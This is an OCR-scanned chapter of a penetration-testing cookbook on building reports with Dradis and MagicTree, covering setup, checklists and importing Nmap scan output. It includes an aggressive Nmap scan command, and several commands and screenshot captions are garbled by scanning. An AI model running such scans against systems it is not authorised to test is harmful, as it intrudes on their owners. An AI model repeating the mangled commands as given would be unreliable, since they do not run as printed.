Writing Reports 


In this chapter, we will cover the following recipes: 


e Generating reports using Dradis 
e Using MagicTree 


Introduction 


In this chapter, we will go through one of the most important steps of a pentesting project, the report. A 
good report must contain every detail of the vulnerability. Our agenda is to keep it as detailed as possible, 
which may help the right person in the department understand all the details and work around it witha 
perfect patch. 


There are different ways to create a pentesting report. In this chapter, you will learn a few tools that we 
can use to create a good report that covers everything in detail. 


Let's look at some of the key points that should always be included in the report: 


Details of the vulnerability 

The CVSS score 

Impact of the bug on the organization 
Recommendations to patch the bug 


Common Vulnerability Scoring System (CVSS) is a standardized method for rating IT vulnerabilities 
and determining the urgency of a response. 


Gp You can read more about CVSS at https://www.first.org/cvss. 





Generating reports using Dradis 


Dradis is an open source browser-based application, which can be used to combine the output of different 
tools and generate a report. It is extremely easy to use and comes preinstalled with Kali. However, 
running it may show errors. So, we will reinstall it and then learn how to use it. 


How to do it... 


Following is the recipe for using Dradis: 


1. First, we need to install the dependencies by running the following commands: 


apt -get 
apt -get 
apt -get 
apt -get 
apt -get 


install libsqlite3-dev 

install libmariadbclient -dev-compat 
install mariadb-client-10.1 
install mariadb-server-10.1 
install redis-server 


2. We then use the following command: 


| git clone https://github.com/dradis/dradis-ce.git 


The following screenshot shows the output of the preceding command: 


i-# git clone https://github.com/dradis/dradis-ce.git 
Cloning into 'dradis-ce'... 

remote: Counting objects: 7232, done. 

remote: Compressing objects: 100% (17/17), done. 


remote: Total 7232 (delta 5), reused 3 (delta 0), pack-reused 7215 
Receiving objects: 100% (7232/7232), 1.25 MiB | 1.01 MiB/s, done. 
Resolving deltas: 100% (4716/4716), done. 





3. Then, we change our directory: 


| cd dradis-ce/ 


4. Now we run the following command: 


| bundle install --path PATH/TO/DRADIS/FOLDER 


The following screenshot shows the output of the preceding command: 


= Enabling default add-ons == 

= Installing dependencies == 

Warning: the ru J versior f Bundler (1.13.6) is 
reated the 1 Read Sy a Ses BET Wlele[=s—as uU Upgrade t 


indler by running 


"ft run 
installing 
ISe] 
Warning: ie running rsion of Bundle! 
reated the Lockfile (1.15.3). We Suggest you upgrade 
indler- by running em install bundle 
etching https://github.com/dradis/dradis-calculator_ cvss.git 
etching https://github.com/dradis/dradis-calculator dread.git 
etching https://github.com/dradis/dradis-csv.git 
etching https://github.com/dradis/dradis-html_export.git 
etching https://github.com/dradis/dradis-acunetix.git 
etching https://github.com/dradis/dradis-brakeman.git 





5. We run this command: 


| ./bin/setup 


6. To start the server, we run this: 


| bundle exec rails server 


The following screenshot shows the output of the preceding command: 


root@kali: is-ce# bundle exec rails server 

=> Booting Thin 

=> Rails 5.1.3 application starting in development on http://localhost :3000 
=> Run ‘rails server -h for more startup options 


Thin web server (v1.6.3 codename Protein Powder) 
Maximum connections set to 1024 
Listening on Localhost:3000, CTRL+C to stop 





7. We can access Dradis on https: //localhost :3000 NOW. 


8. Here, we can set up our password to access the framework and log in with the password: 


Configure the shared password 


This server does not have a password yet, please set up one: 
Password 


Confirm Password 


Set password and continue 


9. We will be redirected to the dashboard: 


Dradis CE Q  G@pload output from tool [Export results €#Configuration ?~ &~ 


Project summary 


Issues so far Methodology progress 


There are no issues in this project yet. There are no methodologies in this project yet. 


& Upload output from + Add a testing methodology 
tool 


Rarant activitw 





10. The free version of Dradis supports plugins of various tools such as Nmap, Acunetix, and Nikto. 


11. Dradis allows us to create methodologies. It can be considered a checklist, which can be used while 
performing a pentest activity for an organization: 


Dradis CE 


am Nodes 





12. To create a checklist, we go to Methodologies and click on Add new: 


Add methodology to project 


Name New checklist 


You can customize the name of this methodology. Useful if you need to add the same one multiple times (e.g. several apps in one project). 


Peon) cam OF Cancel 


13. We then assign a name and click on Add to Project: 


Basic checklists {J Advanced boards and task assignment 


# Edit ff Delete 
Section #1 


(C] Task #1.1 


Task #1.2 


Section #2 


Task #2.1 


14. We should now see a sample list created for us. We can edit it by clicking on the Edit button on the 
right-hand side: 





Content 


<?xml version="1.0"?> 
<?xml version="1.0"?> 
<methodology> 
<name> Test checklist</name> 
<sections> 
<section> 
<name> Information Gathering</name> 
<tasks> 
<task>Perform Full Port Scan</task> 
<task> Run Nikto</task> 
</tasks> 
</section> 
</sections> 
</methodology> 





15. Here, we see that the list is created in XML. We can edit and save it by clicking on Update 
methodology: 


Basic checklists | [J Advanced boards and task assignment 


Pisaacedces Add newr 


# Edit f Delete 
Information Gathering 


Perform Full Port Scan 


Run Nikto 


16. Now let's look at how we can organize our scan reports better. We go to the nodes option on the left- 
hand side menu and click on the + sign; a pop-up box will open and we can add a network range and 
then click on Add: 


Add top-level node 


®) Add one 
© Add multiple 





* Label 


Icon No icon 





17. To add a new subnode, we select the node from the left-hand side pane and then choose the Add 
subnode option. This can be used to organize a network-based activity based on the host's IP 
addresses. 


18. Next, we can add notes and screenshots as PoC of the bugs we find: 


Host properties 


Notes + 
Evidence + 
Attachments 
BE 


19. We can even import results of various tools to Dradis. This can be done by choosing Upload Output 
from tool from the top menu: 


———— 
Upload Manager 


Use the form below to upload output files from other tools. 


1. Choose a tool 


_Dradis::Plugins::Acunetlx i 
Dradis::Plugins::Acunetix 
Dradis::Plugins::Brakeman 
Dradis::Plugins::Burp 
Dradis::Plugins::Metasploit 
Dradis::Plugins::NTOSpider 
Dradis::Plugins::Nessus 
Dradis::Plugins::Nexpose 
Dradis::Plugins::Nikto 
Dradis::Plugins::Nmap 
Dradis::Plugins::OpenVAS 
Dradis::Plugins::Projects::Upload::Package 
Dradis::Plugins::Projects::Upload:: Template 
Dradis::Plugins::Qualys 








Dradis::Plugins::Zar 


Available plugins 


20. Here, we upload our output file. Dradis has inbuilt plugins, which can parse reports of different 


tools: 


Upload progress: 


| 
3. Output 


Filename: C:\fakepath\hs.xml 
Size: 5.89 KB 





21. Once the import is done, we will see the results on the left-hand side pane under the title piugin 


output: 


Dradis CE 


en Nodes 


© 10.11.1.31 





22. We can see the output of the scan results we just imported: 


10.11.1.31 


Services 
name port product protocol reason state version 
http 80 tcp syn-ack open 
msrpc 135 tcp syn-ack open 
netbios-ssn 139 tcp syn-ack open 
microsoft-ds 445 tcp syn-ack open 
NFS-or-IIS 1025 tcp syn-ack open 
ms-sql-s 1433 tcp syn-ack open 


ms-wbt-server 3389 tcp syn-ack open 


23. Similarly, different scans can be imported and combined together and can be exported as one single 
report using the Dradis framework: 





Export Manager 


Export results in CSV format Generate advanced HTMLreports Save and restore project information [jCustom Word reports _[) Custom Excel reports 


Choose a template 


Please choose one of the templates available for this plugin (find themin ./templates/reports/html_export ) 
@ basic.html.erb 


default_dradis_template_v3.0.html.erb 


More information on Dradis can be found on the official website at https://dradisframework.co 
n/. 


Using MagicTree 


MagicTree is a data management and reporting tool similar to Dradis. It is preinstalled on Linux and it 
organizes everything using a tree and node structure. It also allows us to execute commands and export the 
results as a report. In this recipe, we will look at some of the things we can do using MagicTree to ease 
our pentesting task. 


How to do it... 


Following is the recipe for using MagicTree: 


1. We canrun it from the Application menu. 
2. We accept the terms and the application will open up: 


MagicTree License Agreement 


Please review and accept the license agreement to use MagicTree 





MagicTree License Agreement 


This software license agreement is a legal agreement between you (either an individual or an entity) and Gremwell BVBA. By installing the SOFTWARE, 
clicking the "Accept" button during installation, and/or using the SOFTWARE you are agreeing to be bound by the terms of this agreement. 


COPYRIGHT. The SOFTWARE and accompanying materials (including any images, "applets", photographs, animations, video, audio, music and text 
incorporated into the SOFTWARE and accompanying materials) is owned by Gremwell BVBA and is protected by copyright laws and international treaty 
provisions and all other applicable laws, 


GRANT OF LICENSE, The SOFTWARE is licensed to you by Gremwell BVBA and at no time do you have any ownership of the SOFTWARE, This License 
Agreement permits you to install and use the SOFTWARE on any computer or computers. 


INSTALLATION AND SUPPORT. You are solely responsible for the installation and maintenance of the SOFTWARE, and for the proper installation, 
configuration, and operation of the SOFTWARE and the hardware, supporting software, and services upon which the SOFTWARE relies. You are solely 
responsible for the configuration and operation of the SOFTWARE, 


NO OTHER WARRANTIES. To the maximum extent permitted by applicable law, Gremwell BVBA disclaims all other warranties, either express or implied, 
including but not limited to suitability for any particular purpose, or the ability of the licensee to operate the SOFTWARE or a successful business based 
on the SOFTWARE. 


REDISTRIBUTION. You may not redistribute the Software, except with a prior written permission from Gremwell BVBA. 
NO WARRANTIES ARE EXPRESSED OR IMPLIED WITH RESPECT TO THE SOFTWARE, ITS QUALITY, PERFORMANCE, ACCURACY OR SUITABILITY FOR ANY 


PURPOSE, IN NO CIRCUMSTANCES WILL GREMWELL BVBA BE LIABLE FOR DIRECT, INDIRECT, INCIDENTAL OR CONSEQUENTIAL DAMAGES RESULTING FROM THE 
USE OF THE SOFTWARE. 














Accept Decline 





3. Next, we create a new node by going to Node | AutoCreate: 























( Tree \ Autocreate... ctri-' (] Table View [| (] Matrix’ 
Create child » 
Delete Delete /-1/ || Query/Method not saved i 
Add port... ctr-P 
ites oe 








4. In the box that opens, we type the IP address of the host we want to be added. 
5. Once the node is added, it will appear in the left-hand side pane: 


File Edit Node Repository Report Help 
‘( Tree View | 
qr qu Q2 Q=- 
W magictree 
¢ W testdata 
(J netblock 192.168.2.0/24 




















6. To runa scan ona host, we go to the Table View; at the bottom, we will see an input box titled 


Command: 



























































































































































“(J Table View | (] Matrix view | (] Task Manager | 
Query/Method not saved in repository 
Title Expression Leaf Hidden " | ss 
] | 
v 
Run Stop | < Prev | Next > Copy | Clear Save 
Found N/A row(s) Copy Clear Table cell click action: ® none © select 
5 @~ a ~ Be satis ~ F Run 
Input No input @ Environment © TabSep in $in file (© No input 
Command | |~ Save 
User@Host | [x Push SSH key 



































7. We will run an Nmap scan on the host we just added. 
8. MagicTree allows you to query the data and send it to the shell. We click on the Q* button, and it 
will automatically select the hosts for us: 


File Edit Node Repository Report Help 


( (] Tree View 
Q* ql Q2 Q= 
W! magictree 
e W! testdata 

@ netblock 192.168.2.0/24 




















9. Now we just need to type the following command: 


| nmap -v -Pn -A -oX $results.xml $host 


The following screenshot shows the output of the preceding command: 























Input 1 rows, 1 field(s): host @ Environment © TabSep in $infile ‘© No input un 
Command __|nmap -v -Pn -A -oX $results.xml $host v Save 
User@Host m4 Push SSH key 




















10. Since hosts are already identified, we do not need to mention them here. Then, we click on Run: 





“ (] Table View i (] Matrix View [ (] Task Manager 











All tasks 


Reset Filter 
State Title ExitValue | OutFiles 
done jnmap -v -Pn -A $results.xml $host Delete 


Kill 


Edit 

















Command nmap - -Pn A $results.xml $host 


Host State FINISHED Exit Value 0 





Started: September 15, 2017 6:40:26 AM EDT 
Finished: September 15, 2017 6:40:31 AM EDT 


( Output Files (1) | Input Rows (1) | Output Objects (0) | 


Completed NSE at 06:40, 0.00s elapsed 
Read data files from: /usr/bin/../share/nmap 


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 4.57 seconds 
Raw packets sent: 1088 (50.954KB) | Revd: 2168 (95.256KB) 


| || Search | 


Console | Re-run || Kill 



































11. We will see a window that shows the scan being executed along with the output. Once the scan is 
complete, we can click on Import, and it will be imported into the tool. 

12. Similarly, we can run any other tool and import its report to MagicTree. We can generate a report by 
navigating to Report | Generate Repott...: 









Report Help 


enerate report... 


13. Inthe next window, we can browse the list of templates we would like to use to save the report: 








Look In: io report-templates || es} [a] f=] 


[) base.docx [\ simp 
[) base. odt CT) summ 
[\ example.mt [\ sum 
[\ open-ports-and-summary-of-findings-by-host.docx [\ sum 
[\ open-ports-and-summary-of-findings-by-host. odt CT) summ 
[\ simple-test-log.docx [\ sumo 














4 Mh 








File Name: | 








Files of Type: ‘All Files 











14. Then, we click on the Generate Report button, and we will see a report being generated: 


Generate Report 


Lancet 





There's more... 


There are other tools that can be used for report generation, such as the following: 


e Serpico: https://github.com/SerpicoP roject/Serpico 
e Vulnreport: http//vulnreport.io/ 


